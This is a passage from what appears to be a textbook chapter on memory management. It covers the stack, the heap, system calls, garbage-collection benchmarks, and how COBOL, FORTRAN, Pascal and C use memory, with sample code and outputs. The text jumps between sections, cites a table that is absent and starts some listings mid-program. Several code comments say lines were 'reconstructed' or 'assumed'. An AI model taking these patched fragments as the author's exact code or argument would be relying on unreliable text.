several different possible execution paths, a lot of storage is
wasted.
Table 3.2 summarizes a comparison of these two techniques.
Table 3.2
                     All-at-once Allocation   Extra Stack Frames
Speed                faster                   slower
Stack memory usage   more                     less
Executable size      smaller                  larger
Static or Dynamic?
The stack is a hybrid between a purely static and a purely dynamic
form of storage. It is not purely static because the amount of occu-
pied storage on a stack varies with each function call. Each time a
function is invoked, a new activation record is pushed on to the
stack. When a function returns, its activation record vanishes and all
of its associated data goes out of scope.
However, the way in which stack storage is allocated and freed
obeys a strict first-in-last-out (FILO) policy. In addition, the regions
of storage consumed on a stack are almost completely dictated by
the compiler. In a structured language like C, the stack is populated
with nothing but activation records, and the size of each activation
record is fixed at compile time. Thus, there is a lot more regularity
with a stack than there is with a dynamic storage mechanism like a
heap. The stack, as I have said before, is a predictable creature.
Heap Allocation
Heap memory allocation, also known as dynamic memory allocation
(DMA), consists of requesting memory while an application is run-
ning from a repository known as the heap. A heap is just a collection
of available bytes (i.e., a bunch of bytes piled into a heap). Unlike
the data segment or the stack, the size and life span of memory allo-
cated from the heap is completely unpredictable. This requires the
agent that manages the heap to be flexible, and this, in turn, trans-
lates into a lot of extra memory management code.
The data segment requires no special management code, and
stack management is limited primarily to the prologue and epilogue
code of functions. The heap, however, normally has its own dedi-
cated set of elaborate routines to service memory requests.
Table 3.3
Storage        Size                      Life Span           Bookkeeping
data section   fixed                     program life span   none
stack          fixed-size stack frames   function-based      all at compile time
heap           varies                    varies              significant at run time
The heap relies heavily on user mode libraries. These libraries (like
malloc() and free() declared in stdlib.h) may be invoked
directly by programs or called indirectly by a virtual machine. Either
way, these libraries normally end up utilizing facilities provided by
the underlying operating system. Thus, before we dive straight into
managing memory through user libraries, it would help to under-
stand how they communicate with the operating system.
NOTE In case you are wondering, NACHOS stands for Not Another
Completely Heuristic Operating System. I think Richard Burgess is cor-
rect; we are running out of good acronyms.
System calls are not always spelled out with tidy C prototypes.
Some operating systems, like DOS, have a system call interface that
is specified strictly in terms of interrupts. Consider the following
DOS system call:
Interrupt: 0x21 (i.e., INT 0x21)
Function: 0x09
Description: prints a string terminated by a $
Inputs: AH = 9
DS = segment address of string
DX = offset address of string
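Invoking this system call from assembly is just a matter of loading the registers listed above and issuing the interrupt. Here is a minimal sketch (MASM syntax; .STARTUP initializes DS for the small memory model):

.MODEL small, c
.STACK
.DATA
message DB 'hello, DOS$'
.CODE
.STARTUP
MOV AH,09H                ;function 0x09
MOV DX,OFFSET message     ;DS:DX = address of the string
INT 21H                   ;issue the system call
.EXIT
END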
A wise system engineer will attempt to ward off complexity by ban-
ishing the system-related assembly code to the basement of the OS.
There, in the darkness, only a trained plumber with a flashlight can
muck around with the pipes. Even then, an experienced developer
will attempt to wrap the assembly code in C/C++ to make it more
palatable. Tanenbaum, for instance, did an excellent job of wrapping
assembly routines when he implemented MINIX.
System calls are the atomic building blocks that all other APIs rely
on. The user libraries that help to manage memory are built upon
the relevant system calls. The layering effect that is generated by
building one set of functions on top of another is illustrated in Fig-
ure 3.12.
Figure 3.12
User libraries cannot directly access system calls. They must all
travel through a choke point called the system call gate. If an operat-
ing system were a fortress, the system call gate would be its
drawbridge. Everything outside the gate runs in user mode, and
everything inside the fortress runs in kernel mode.
The system call gate is the only way in and out of the kernel.
This is because memory management at the operating system level,
in conjunction with the processor, prevents user code from making a
FAR JMP directly to kernel functions. For the most part, this keeps
the Viking pillagers at a safe distance from the inhabitants of the
kernel. Occasionally, however, there are curious explorers like Sven
Schreiber who find a hole in the castle wall. Sven found a way
around the Windows 2000 system call gate. He describes this dis-
covery in his book, Undocumented Windows 2000 Secrets.
The putc() function, in turn, wraps a system call called write().
A recurring theme that you will notice is the tendency of functions
with specific duties to invoke more general and primitive routines.
/*
stream = output stream to write to
buffer = buffer of bytes to write to stream
nbytes = number of bytes to write
returns: number of bytes written to stream
*/
int write(int stream, void *buffer, int nbytes)
{
    /* the function header above is reconstructed from the
       comment block; call_struct packages the arguments for
       the kernel, and its declaration and setup are assumed */
    asm
    {
        MOV ECX,USER_LIBRARY
        LEA EAX,call_struct
        INT SYSTEM_GATE
    }
}
Notice how the write() function is actually a front man for a more
general system call gate called SYSTEM_GATE.
156 Chapter 3
The Heap
The heap is just a region of bytes. It is a portion of an application’s
address space that has been set aside for run-time memory
requests. As mentioned previously, the general nature of possible
memory requests forces the code that manages the heap to have to
deal with a number of possible contingencies. The heap manager
cannot handle every type of request equally well, and concessions
have to be made. As a result of this, heap management is beset by
three potential pitfalls:
- Internal fragmentation
- External fragmentation
- Location-based latency
Internal fragmentation occurs when memory is wasted because a
request for memory resulted in the allocation of a block of memory
that was much too big, relative to the request size. For example,
let’s say you request 128 bytes of storage and the run-time system
gives you a block of 512 bytes. Most of the memory you’ve been
allocated will never be used. Management schemes that allocate
fixed-sized memory blocks can run into this problem.
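The following toy allocator (a sketch of mine; the pool and block sizes are arbitrary) makes the problem concrete. Every request, however small, consumes an entire 512-byte block, so a 128-byte request wastes 384 bytes:

#include<stdio.h>

#define BLOCK_SIZE 512
#define NBLOCKS    8

static unsigned char pool[NBLOCKS*BLOCK_SIZE];
static unsigned char used[NBLOCKS];

void *fixedAlloc(unsigned long nbytes)
{
    int i;
    if(nbytes>BLOCK_SIZE){ return NULL; }
    for(i=0;i<NBLOCKS;i++)
    {
        if(!used[i])
        {
            used[i]=1;
            /* the slack at the end of the block is internal
               fragmentation */
            printf("%lu bytes wasted\n",BLOCK_SIZE-nbytes);
            return &pool[i*BLOCK_SIZE];
        }
    }
    return NULL;
}

void main()
{
    fixedAlloc(128);   /* prints "384 bytes wasted" */
    return;
}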
External fragmentation occurs when a series of memory requests
leaves several free blocks of available memory, none of which are
large enough to service a typical request.
Latency problems can occur if two data values are stored far
apart from one another in memory. The farther apart two values are
in memory, the longer it takes for the processor to perform opera-
tions that involve those values. In an extreme case, one value may
be so far away that it gets paged-out to disk and requires a disk I/O
operation to bring it back into the ball game.
Latency problems can also occur because of complexity. If an
algorithm takes extensive measures to ensure that internal and
external fragmentation are both minimized, the improvement in
memory utilization will be offset by the additional execution time
necessary to perform the requisite accounting.
Depending on the allocation technique used by the heap manage-
ment code, it will suffer from one or more of these problems. Rarely
can you have your cake and eat it too.
Figure 3.13 displays these three pitfalls.
In the end, what makes the heap an interesting problem is not
the heap itself, but the algorithms used to manage it. There are two
different approaches to managing heap memory: manual memory
management and automatic memory management.
Figure 3.13
In the next two sections, I will examine both of these techniques
and offer examples of how they are used in practice.
For instance, here is how realloc() can be built on top of
malloc() and free():

/* a sketch of realloc(); the function header and the declaration
   of cptr are reconstructed, and sizeMem() is assumed to return
   the size of the block that ptr points to */
void *realloc(void *ptr, size_t size)
{
    char *cptr;
    int oldsize;

    if (ptr == NULL){ return malloc(size); }
    oldsize = sizeMem(ptr);
    if (size <= oldsize){ return ptr; }

    cptr = (char *)malloc(size);
    memcpy(cptr, ptr, oldsize);
    free(ptr);
    return cptr;
}
The implementation of malloc() and free() varies greatly from
one distribution to the next, so it is a little harder for me to offer ref-
erence implementations. The malloc() and free() functions on
UNIX platforms are front men for the brk() system call. Its proto-
type usually resembles something like this:
int brk(void *end_heap);
The brk() system call changes the size of a
program's heap by either increasing or decreasing its end point. The
end_heap value can be changed as long as it does not infringe on
other sections of the application.
NOTE The POSIX standard does not include brk() on the grounds
that it dictates a certain underlying memory model implementation.
On most flavors of UNIX, however, you will find the brk() system call.
If you are interested in looking at an implementation of brk(), I
would recommend taking a look at the one that accompanies Linux. It
is located in the /usr/src/linux/mm/mmap.c file.
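As a minimal sketch of what sits underneath malloc() and free() on such platforms, the following fragment grows the heap by a page and then shrinks it back (sbrk(0) is the traditional way to ask for the current end of the heap):

#include<stdio.h>
#include<unistd.h>

void main()
{
    char *start;
    char *end;

    start = sbrk(0);        /* current end of the heap */
    brk(start+4096);        /* push the end point up by a page */
    end = sbrk(0);
    printf("heap grew by %ld bytes\n",(long)(end-start));
    brk(start);             /* shrink the heap back */
    return;
}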
Now that you are familiar with C’s manual memory allocation func-
tions, I can demonstrate how dangling pointers occur and what
happens when they do. Consider the following example:
/* --dangleptr.c-- */
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

void main()
{
    char *cptr1;
    char *cptr2;

    cptr1 = malloc(10);
    printf("address=%p\n",cptr1);
    free(cptr1); /* whoops! */

    cptr2 = malloc(10);
    printf("address=%p\n",cptr2);

    /* both calls typically return the same address, so writing
       through the stale cptr1 silently corrupts cptr2's data
       (these closing lines are reconstructed) */
    strcpy(cptr2,"hello");
    strcpy(cptr1,"garble");
    printf("cptr2=%s\n",cptr2);
    return;
}
NOTE Scientists like George Miller have claimed that the average
human can only keep track of about seven things at any point in time.
By forcing the developer to keep track of memory recycling, the num-
ber of things the developer has to juggle increases. Garbage collection
is an effective solution to this problem.
Don’t take my word for it. Here is what Bertrand Meyer, the inventor
of Eiffel, has to say:
“Manual memory management — that is to say, the absence of
automatic garbage collection — suffers from two fatal flaws: it is dan-
gerous (as it is all too easy to make a mistake, causing errors that are
often missed during testing and arise only when the system goes oper-
ational, usually in erratic and hard-to-reproduce conditions); and it is
extremely tedious, forcing the developer to concentrate on mundane
yet complex tasks of bookkeeping and garbage collection instead of
working on their application. These deficiencies are bad enough to
cancel out any benefit that is claimed for the application of object-ori-
ented techniques.”
There were companies that attempted to follow this route, like
Symbolics, which sold LISP
machines. LISP machines were manufactured in the 1970s and
1980s. The idea, unfortunately, never really caught on. In the
mid-1990s, Symbolics went bankrupt.
There are a number of programming environments that support
automatic memory management. This includes popular virtual
machines like Java’s and more obscure run times, like the one that
Smalltalk utilizes. There are even garbage collectors that can be
plugged into native code via user mode libraries. This brings us to
the Boehm-Demers-Weiser conservative garbage collector.
NOTE You will need to make sure that the necessary environmental
variables have been set up. You can do so by executing the
VCVARS32.BAT batch file before you invoke NMAKE.
#include<stdio.h>
#define GC_NOT_DLL
#include<gc.h>

#define KB 1024                /* assumed; this define was lost */

unsigned long oldmem = 0;      /* assumed global used below */

void printMemSize()
{
    unsigned long nfree;
    nfree = GC_get_free_bytes();
    printf("total heap=%7lu\t",GC_get_heap_size());
    printf("free bytes=%7lu\t",nfree);
    if(oldmem!=0)
    {
        printf("change=%ld",(oldmem-nfree));
    }
    printf("\n");
    oldmem = nfree;
    return;
}/*end printMemSize*/

void main()
{
    short j;
    unsigned long i;
    for(j=0;j<15;j++)
    {
        /* the loop body is reconstructed; the 20KB request
           matches the 20480-byte steps in the output below */
        unsigned char *bdwptr;
        bdwptr = GC_malloc(20*KB);
        for(i=0;i<(20*KB);i++){ bdwptr[i]='a'; }
        printMemSize();
    }
    printf("forcing collection\n");
    GC_gcollect();
    printMemSize();
    return;
}/*end main*/
In the previous code example, I reuse the bdwptr pointer repeat-
edly in an effort to create a memory leak. If you compile and run
this program on Windows, you will get output like the following:
total heap= 65536 free bytes= 45056
total heap= 65536 free bytes= 24576 change=20480
total heap= 65536 free bytes= 4096 change=20480
total heap= 65536 free bytes= 24576 change=-20480
total heap= 65536 free bytes= 4096 change=20480
total heap= 131072 free bytes= 49152 change=-45056
total heap= 131072 free bytes= 28672 change=20480
total heap= 131072 free bytes= 8192 change=20480
total heap= 131072 free bytes= 90112 change=-81920
total heap= 131072 free bytes= 69632 change=20480
total heap= 131072 free bytes= 49152 change=20480
total heap= 131072 free bytes= 28672 change=20480
total heap= 131072 free bytes= 8192 change=20480
total heap= 131072 free bytes= 90112 change=-81920
total heap= 131072 free bytes= 69632 change=20480
forcing collection
total heap= 131072 free bytes= 110592 change=-40960
Press any key to continue
As you can see, the amount of free memory does not simply
decrease steadily, as it normally would if you were using malloc().
Instead, it increases a couple of times, which indicates that garbage
collection has occurred. At the end of the sample code, I explicitly
force collection to illustrate this.
NOTE You will need to make sure that the linker includes gc.lib
in its list of libraries. Also, I could only get this to work with the release
version of Visual Studio’s libraries. Trying to link gc.lib to Microsoft’s
debug libraries gave my linker a fit.
Table 3.4
           Manual Memory Management            Automatic Memory Management
Benefits   size (smaller)                      constrains complexity
           speed (faster)
           control (you decide when to free)
Costs      complexity                          larger total memory footprint
           memory leaks                        "comparable" performance
           dangling pointers
Let us look at an example. This way, I cannot be accused of sup-
porting my conclusions with arm waving. Consider the following
program that uses traditional memory management facilities:
#include<stdio.h>
#include<stdlib.h>

#define KB 1024   /* assumed; the define was missing */

void main()
{
short j;
unsigned long i;
for(j=0;j<15;j++)
{
unsigned char *bdwptr;
bdwptr = malloc(KB);
for(i=0;i<KB;i++){ bdwptr[i]='a'; }
}
return;
}/*end main*/
Now look at one that uses the BDW collector:
#include<stdio.h>
#define GC_NOT_DLL
#include<gc.h>

#define KB 1024   /* assumed; the define was missing */

void main()
{
short j;
unsigned long i;
for(j=0;j<15;j++)
{
unsigned char *bdwptr;
bdwptr = GC_malloc(KB);
for(i=0;i<KB;i++){ bdwptr[i]='a'; }
}
return;
}/*end main*/
When I built both of these programs on Windows, the executable
that used manual memory management calls was 27,648 bytes in
size. The executable that used the BDW collector was 76,800 bytes
in size. This is over twice the size of the other program. QED.
With manual memory management, the programmer is responsi-
ble for keeping track of allocated memory. None of the bookkeeping
manifests itself in the source code as extra instructions. When the
programmer wants to release memory, they call free(). There is
no need to execute a lengthy series of functions to sweep through
memory looking for “live” pointers.
In the process of hunting down memory to free, the garbage col-
lector will also find many allocated regions of memory that are still
needed, and it will not free these blocks of memory. However, this
means that the collector will repeatedly perform unnecessary pro-
cedures every time it attempts collection. This suggests to me that
these superfluous actions will cause automatic memory collection to
be necessarily slower than manual memory management.
Again, I would like to rely on empirical data instead of just
appealing to your sense of intuition. Consider the following source
code:
#include<stdio.h>
#include<windows.h>
#include<stdlib.h>
#define KB 1024
void main()
{
short j;
unsigned long i;
long msecs1,msecs2;
unsigned char *bdwptr[16*KB];
msecs1 = msecs2 = 0;
msecs1 = GetTickCount();
for(j=0;j<(16*KB);j++)
{
bdwptr[j] = malloc(KB);
for(i=0;i<KB;i++){ (bdwptr[j])[i]='a'; }
}
msecs2 = GetTickCount();
printf("msec elapsed=%ld\n",(msecs2-msecs1));
return;
}/*end main*/
Now consider another program that uses the BDW collector:
#include<stdio.h>
#include<windows.h>
#define GC_NOT_DLL
#include<gc.h>
#define KB 1024
void main()
{
short j;
unsigned long i;
long msecs1,msecs2;
msecs1 = msecs2 = 0;
msecs1 = GetTickCount();
for(j=0;j<(16*1024);j++)
{
unsigned char *bdwptr;
bdwptr = GC_malloc(KB);
for(i=0;i<KB;i++){ bdwptr[i]='a'; }
}
msecs2 = GetTickCount();
printf("msec elapsed=%ld\n",(msecs2-msecs1));
return;
}/*end main*/
The program that used malloc() completed execution in 427 mil-
liseconds. The program that used the BDW garbage collector took
627 milliseconds to execute. I ran each of these programs several
times to prove to myself that this wasn’t some kind of fluke.
- Manual memory program times: 432, 427, 426, 443, 435, 430, 437, 430
- BDW collector program times: 633, 622, 624, 650, 615, 613, 630, 627
Time units are in milliseconds. I could have performed more trials
and included an extended statistical analysis of mean values, but I
think the results are already pretty clear.
Consider the advent
of structured programming in the late 1960s. The essay that led to
the birth of structured programming was written by Dijkstra in
1968. It was a letter in the Communications of the ACM titled
"Go To Statement Considered Harmful." This revolutionary paper
caused quite a stir. The state-of-the-art languages at the time, like
COBOL II and FORTRAN IV, used GOTOs liberally.
From Table 3.5, it seems that the number of lines of code that can
be efficiently managed by a language increases by a factor of 10 as
you switch to more sophisticated paradigms (see Table 3.6).
Table 3.6
Language     Paradigm                  Complexity Threshold
Raw binary   no-holds-barred           10,000 instructions
Assembler    block-based using GOTO    100,000 lines
C            structured (no GOTO)      1,000,000 lines
C++          object-oriented           10,000,000 lines
Inevitably, the languages that survive, and perhaps pass on their fea-
tures to new languages, will be the ones that are the most effective
at managing complexity. In the early days of UNIX, almost every bit
of system code was written in C. As operating systems have grown,
the use of C, as a matter of necessity, has given way to implementa-
tion in C++. According to an article in the July 29, 1996, Wall Street
Journal, the Windows NT operating system consists of 16.5 million
lines of code. It is no surprise, then, that Microsoft has begun
building some of its primary OS components entirely in C++.
There are memory managers today that allow dozens of tightly
coupled processors to share the same address space, and there
are elegant object-oriented languages that allow complexity to be
constrained.
In the following sections, I am going to provide a brief survey of
several programming languages in order to demonstrate how differ-
ent languages make use of the different high-level memory
services. I will begin with early languages and work my way slowly
to the present day. Along the way, I will try to offer examples and
insight whenever I have the opportunity.
COBOL has taken on a life of its own and has probably developed
enough inertia to last at least another hundred years.
The preponderance of COBOL is partially due to historical
forces. COBOL was adopted by the United States Department of
Defense (DoD) in 1960 and became a de facto standard. The reason
for this is that the DoD, the largest purchaser of computer hardware
both then and now, would not buy hardware for data processing
unless the vendor provided a COBOL compiler. Another reason
COBOL is so widespread is due to the fact that COBOL is very
good at what it is designed for — executing business calculations.
When it comes to performing financial computations to fractions of a
cent without introducing rounding errors, COBOL is still the king of
the hill. The language features that support financial mathematics in
COBOL are a very natural part of the language and extremely easy
to use.
QUESTION
Will COBOL ever die? Will it be replaced?
ANSWER
I would like to assume that someday COBOL will be retired.
However, I suspect that COBOL houses will probably, fundamen-
tally, stay COBOL houses. 180 billion lines is a lot of source code.
They may occasionally renovate with Object COBOL or slap on a
new layer of paint with Java, but replacing the plumbing of an
aging mansion is a very expensive proposition. In fact, it’s often
cheaper to just tear the house down and build a new one. Try
explaining this to the CFO of a Fortune 100 company.
Legacy code may be old, but it supports core business func-
tionality and has been painstakingly debugged. In this kind of
situation, legacy code is seen as a corporate asset that represents
the investment of hundreds of thousands of man-hours. An archi-
tect who actually does want to overhaul a system will, no doubt,
face resistance from a CFO whose orientation tends toward dol-
lars and cents. If a system does what it’s supposed to and helps to
generate income, then why fix it? Throwing everything away for
the sake of technology alone is a ridiculously poor excuse.
Another factor that inhibits the replacement of legacy code is
the sheer size of an existing code base. In order to replace old
code with new code, you have to completely understand the func-
tionality that the old code provides. In a million-line labyrinth of
80-column code, business logic is hard to extract and duplicate.
Often, the people who wrote the code have left the company or
have been promoted to different divisions. Instituting even a
modest change can therefore be a risky and expensive undertaking.
If you are running Windows, you can download a COBOL compiler
from Fujitsu's web site.
COBOL is a structured language that does not use a stack or a
heap. All that a COBOL program has at its disposal is a single global
data section and blocks of instructions. In COBOL parlance, a pro-
gram consists of four divisions:
1. Identification division
2. Environment division
3. Data division
4. Procedure division
The identification division is used to let the COBOL compiler know
the name of the program it is translating. The identification division
doesn’t get translated in machine code; it is more of a directive. The
environment division is used to describe the platform that a pro-
gram will be built on and run on, as well as to specify the files that it
will use. Again, this is mostly metadata that is intended for use by
the compiler.
The data division contains, among other things, a working stor-
age section that is basically a large static memory region that serves
all of a program’s storage needs. As I said before, there is no heap
and no stack that a COBOL program can utilize. All that exists is
one big chunk of fixed-size, global memory.
The procedure division consists of blocks of instructions. These
blocks of code do not have formal parameters or local variables like
functions in C. This would require a stack, which COBOL programs
do not have.
Figure 3.14
NOTE You might notice line numbers in the previous program’s list-
ing. This is a holdover from the days when punch cards were fed to
mainframes. The motivation was that if you dropped your box of cards
and they became mixed up, you could use the line numbering to sort
your cards back to the proper order.
.MODEL small, c
.STACK
;working storage-----------------------
.DATA
assets DW 0H
debt DW 0H
net DW 0H
;procedure division--------------------
.CODE
.STARTUP
MOV AX,07H
MOV [assets],AX
MOV AX,03H
MOV [debt],AX
MOV DX,[assets]
MOV CX,[debt]
SUB DX,CX
ADD DX,'0'
MOV AH,0EH
MOV AL,DL
INT 10H
.EXIT
END
000051*--------------------------------------------------
000052 SUBROUTINES SECTION.
000053 INIT-ARRAY.
000054 MOVE 5 TO ARRAY-ELM (1).
000055 MOVE 6 TO ARRAY-ELM (2).
000056 MOVE 3 TO ARRAY-ELM (3).
000057 MOVE 7 TO ARRAY-ELM (4).
000058 MOVE 4 TO ARRAY-ELM (5).
000060 COMPUTE-AVERAGE.
000062 PERFORM COMPUTE-AVERAGE-SUM ARRAY-SIZE TIMES.
000064 DIVIDE ARRAY-SIZE INTO AVERAGE.
000065 DISPLAY "average is: " AVERAGE.
000070 COMPUTE-AVERAGE-SUM.
000071 ADD ARRAY-ELM(COUNT-INDEX) TO AVERAGE.
000081 ADD 1 TO COUNT-INDEX.
000091 GET-MAX.
000101 MOVE 1 TO COUNT-INDEX.
000102 MOVE ARRAY-ELM(1) TO ARRAY-MAX.
000111 PERFORM GET-MAX-EXAMINE-CURRENT ARRAY-SIZE TIMES.
000112 DISPLAY "max is: " ARRAY-MAX.
000121 GET-MAX-EXAMINE-CURRENT.
000131 IF ARRAY-ELM(COUNT-INDEX) > ARRAY-MAX
000132 MOVE ARRAY-ELM(COUNT-INDEX) TO ARRAY-MAX
000141 END-IF
000151 ADD 1 TO COUNT-INDEX.
When this source code (statistics.cob) is compiled and linked
into an executable, it will produce the following output when run:
average is: 05
max is: 7
The absence of the stack and heap may be a good thing from the
view of a sysadmin, who does not have to worry about memory
leaks or buffer overflow exploits, but from the perspective of a pro-
grammer, COBOL’s spartan memory arrangement is a curse. Very
large COBOL applications can quickly become impossible to main-
tain or even understand. As a veteran Y2K COBOL programmer, I
can attest to this fact. Some of the programs I looked at were so
large, complicated, and crucial to business operations, that I was
often scared to touch anything.
NOTE Any computer science student who has ever studied compiler
theory will recognize the name Backus. This is because John Backus
helped invent a notation called Backus-Naur Form (BNF), which is used
to specify the context-free grammar of a programming language.
CALL GETMAX(ARRAY,5,MAX)
WRITE(*,*) "max= ", MAX
END
*--------------------------------------------------------
REAL FUNCTION GETAVG(ARR,NELM)
INTEGER ARR(NELM)
INTEGER INDEX
REAL SUM
SUM=0
DO 10,INDEX = 1,NELM
SUM=SUM+ARR(INDEX)
10 CONTINUE
GETAVG = SUM/NELM
END
*--------------------------------------------------------
SUBROUTINE GETMAX(ARR,NELM,MX)
INTEGER ARR(NELM)
INTEGER MX
MX=ARR(1)
DO 20,INDEX =2,NELM
IF(ARR(INDEX)>MX) THEN
MX = ARR(INDEX)
END IF
20 CONTINUE
END
If you run this program, you will see:
val= 10.1999998
max= 26
As you can see, F77 provides much better encapsulation than
COBOL 85. Each procedure is capable of declaring its own local
variables and formal parameters.

Figure 3.15
FUNCTION SIGMA(VAL)
INTEGER VAL
INTEGER SUM
SAVE SUM
SUM=SUM+VAL
SIGMA = SUM
END
When the previous program is run, the following output is
displayed:
3.
8.
10.
17.
Pascal, invented by Niklaus Wirth, is based on a programming
language called ALGOL. This seems only natural when
you consider that Wirth was part of the group that originally created
ALGOL. During the 1960s, FORTRAN had supplanted ALGOL as
the mathematical programming language of choice. As a result, the
designers of ALGOL were looking for ways to extend the language.
Pascal supports heavy use of the stack and, unlike F77, allows
function calls to be recursive. Pascal also provides manual access to
the heap via the NEW and DISPOSE statements. Pascal allows global
variables to be defined, which are stored in a static data segment.
Pascal is the first language that we have examined that uses the
stack, the heap, and a data section.
Wirth admits, however, that Pascal is really a toy language that is
intended for educational purposes. The language has a limited set of
features, and this handicap is compounded by the fact that the
Pascal compiler enforces a rigid set of syntax rules. Pascal is not a
suitable language for developing large projects and has been called a
bondage-discipline language by some engineers. Wirth ended up
moving on to invent other languages like Modula and Oberon.
Borland, which marketed a very successful Pascal compiler in the
1980s, currently sells an object-oriented variation of Pascal called
Delphi.
Here is a brief example that demonstrates Pascal's nested
procedures (the program name is arbitrary):

program nesting;
var
value:integer;

procedure callNested;
function nested1:integer;
function nested2:integer;
begin
writeln('inside nested2()');
nested2 := value+1;
end;
begin
writeln('inside nested1()');
nested1 := nested2+1;
end;
begin
writeln('inside callNested()');
writeln('value= ',nested1);
end;
begin
value:=5;
callNested;
end.
When run, this program will generate the following output:
inside callNested()
value= inside nested1()
inside nested2()
7
Here is another brief example that demonstrates how Pascal can
use different memory components:
program ptour;
const
size=6;
type
intPointer=^integer;
var
iptr:intPointer;
index:integer;
function factorial(arg:integer):integer;
begin
if arg>1 then
factorial := arg * factorial(arg-1)
else
factorial :=1;
end;
begin
index:=10;
iptr:=new(intPointer);
iptr^:=0;
for index:= 1 to size do
begin
iptr^:= iptr^ + factorial(index);
writeln('factorial(',index,')= ',factorial(index))
end;
writeln('iptr^=',iptr^);
dispose(iptr);
end.
If you run this program, the following output will be sent to the
console:
factorial(1)= 1
factorial(2)= 2
factorial(3)= 6
factorial(4)= 24
factorial(5)= 120
factorial(6)= 720
iptr^=873
The factorial() function is recursive, which proves that Pascal
implements activation records on the stack. I also manually allocate
an integer off the heap and store its address in the variable iptr
to show how Pascal's manual memory management scheme works.
Pascal’s variety of memory management facilities and its
easy-to-read structured format place it above COBOL 85 and F77
on the scale of sophistication. However, Pascal is not a language that
you would use to construct production software. The organization of
heavily nested routines in Pascal source code does not lend itself to
constructing large-scale applications. This is why I decided to pres-
ent Pascal before my discussion of C and Java. Pascal may possess
memory management bells and whistles, but it is not a prime-time
language.
Case Study: C
The C programming language is the Swiss army knife of program-
ming languages. It is compact, versatile, and you can do darn near
everything with it. Perhaps this is why every operating system
being sold today has been written mostly in C. Part of C’s utility is
based on the language’s provision for low-level operations like
bit-wise manipulation and inline assembly code. C also possesses a
syntax that allows memory addresses to be symbolically manipu-
lated in a number of intricate ways. Furthermore, the fairly simple
function-based granularity of scope is a straightforward alternative
to Pascal’s tendency toward heavy procedure nesting.
Here is a short program, implementing a rudimentary error stack,
that uses the data segment, the stack, and the heap all at once.
(The global variables below correspond to the _stack, _SP, and
_ErrLvl symbols that appear in the assembly listing that follows.)

#include<stdio.h>
#include<stdlib.h>
#include<string.h>

#define ERR_STK_SZ 64
#define ERR_STR_SZ 128

#define ERR_LVL_WARN 0
#define ERR_LVL_ERROR 1
#define ERR_LVL_FATAL 2

struct ErrData
{
    char *info;
    unsigned char level;
};

struct ErrData *stack[ERR_STK_SZ];
int SP;
char *ErrLvl[]={"WARN","ERROR","FATAL"};

void bldErr();
void checkStack();
int main()
{
SP=0;
bldErr();
checkStack();
return(0);
}/*end main*/
void bldErr()
{
stack[SP]=(struct ErrData*)malloc(sizeof(struct
ErrData));
(*stack[SP]).info = malloc(ERR_STR_SZ);
(*stack[SP]).level = ERR_LVL_ERROR;
strncpy((*stack[SP]).info,"testing",ERR_STR_SZ-1);
SP++;
return;
}/*end bldError*/
void checkStack()
{
int i;
for(i=0;i<SP;i++)
{
printf("%s\n",(*stack[i]).info);
printf("%s\n",ErrLvl[(*stack[i]).level]);
}
return;
}/*end checkstack*/
If you compile this program and examine the assembly code listing
that the compiler generates, you can see how the stack, the heap,
and the data segment are all put to use. Here is the listing for
bldErr():
EXTRN _malloc:NEAR
EXTRN _strncpy:NEAR
_DATA SEGMENT
ORG $+2
$SG344 DB 'testing', 00H
_DATA ENDS
_TEXT SEGMENT
_bldErr PROC NEAR
push ebp
mov ebp, esp
push 8
call _malloc
add esp, 4
mov ecx, DWORD PTR _SP
mov DWORD PTR _stack[ecx*4], eax
push 128 ; 00000080H
call _malloc
add esp, 4
mov edx, DWORD PTR _SP
mov ecx, DWORD PTR _stack[edx*4]
mov DWORD PTR [ecx], eax
mov edx, DWORD PTR _SP
mov eax, DWORD PTR _stack[edx*4]
mov BYTE PTR [eax+4], 1
push 127 ; 0000007fH
push OFFSET FLAT:$SG344
mov ecx, DWORD PTR _SP
mov edx, DWORD PTR _stack[ecx*4]
mov eax, DWORD PTR [edx]
push eax
call _strncpy
add esp, 12 ; 0000000cH
mov ecx, DWORD PTR _SP
add ecx, 1
mov DWORD PTR _SP, ecx
pop ebp
ret 0
_bldErr ENDP
_TEXT ENDS
EXTRN _printf:NEAR
_DATA SEGMENT
$SG350 DB '%s', 0aH, 00H
$SG351 DB '%s', 0aH, 00H
_DATA ENDS
_TEXT SEGMENT
_i$ = -4
_checkStack PROC NEAR
push ebp
mov ebp, esp
push ecx
mov DWORD PTR _i$[ebp], 0
The string literals and the global ErrLvl table end up in the
program's data segments:

_ErrLvl DD FLAT:$SG336
DD FLAT:$SG337
DD FLAT:$SG338
$SG336 DB 'WARN', 00H
ORG $+3
$SG337 DB 'ERROR', 00H
ORG $+2
$SG338 DB 'FATAL', 00H
_DATA ENDS
;--------------------------------------
_DATA SEGMENT
ORG $+2
$SG344 DB 'testing', 00H
_DATA ENDS
;--------------------------------------
_DATA SEGMENT
$SG350 DB '%s', 0aH, 00H
$SG351 DB '%s', 0aH, 00H
_DATA ENDS
If you look at the assembly code for any of the functions, you will
notice that they all have prologue and epilogue code to manage acti-
vation records. This is irrefutable evidence that the stack is being
used. For example, take a look at the assembly code for
checkStack():
_checkStack PROC NEAR
;-----------------------------------
; function body implementation here
;-----------------------------------
_checkStack ENDP
Finally, the heap allocation that occurs is facilitated by the
malloc() library call, which is prototyped in stdlib.h. This
may resolve to a system call behind the scenes, such that:
stack[SP]=(struct ErrData*)malloc(sizeof(struct
ErrData));
becomes:
push 8 ; # bytes to allocate
call _malloc ; call malloc()
add esp, 4 ; clean up stack from call
mov ecx, DWORD PTR _SP           ; set up index to access stack[]
mov DWORD PTR _stack[ecx*4], eax ; address was returned in EAX
Before the actual library call is made, the number of bytes to be
allocated is pushed onto the stack. Once the call is over, the address
of the first byte of the allocated memory region is placed in EAX.
C has supported all of its memory features since its inception.
Stack frames and heap allocation were not extensions amended to
the language by a standards committee 10 years after the first spec-
ification was released. Instead, C was the product of a few inspired
individuals who truly understood the utility of terse and simple
language syntax. Compare the grammar of C to that of a commit-
tee-based language like COBOL. In contrast to C, COBOL is a
behemoth.
But, as Stan Lee would say, "With great power comes great
responsibility." C's flexibility does not come without a price. The
very features that allow C to manage memory so effectively can also
produce disastrous consequences if they are not used correctly.
Memory leaks and dangling pointers are just two of the perils that
we have seen. The syntax of C also allows addresses to be cast and
moved around so that you might not be sure what a program is
referencing.
Here is an example of what I am talking about:
/* ---mess.c--- */
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

/* function pointer type used by main() */
typedef void (*fptr)();
void function4()
{
printf("called function4()\n");
return;
}/*end function4*/
void* function3()
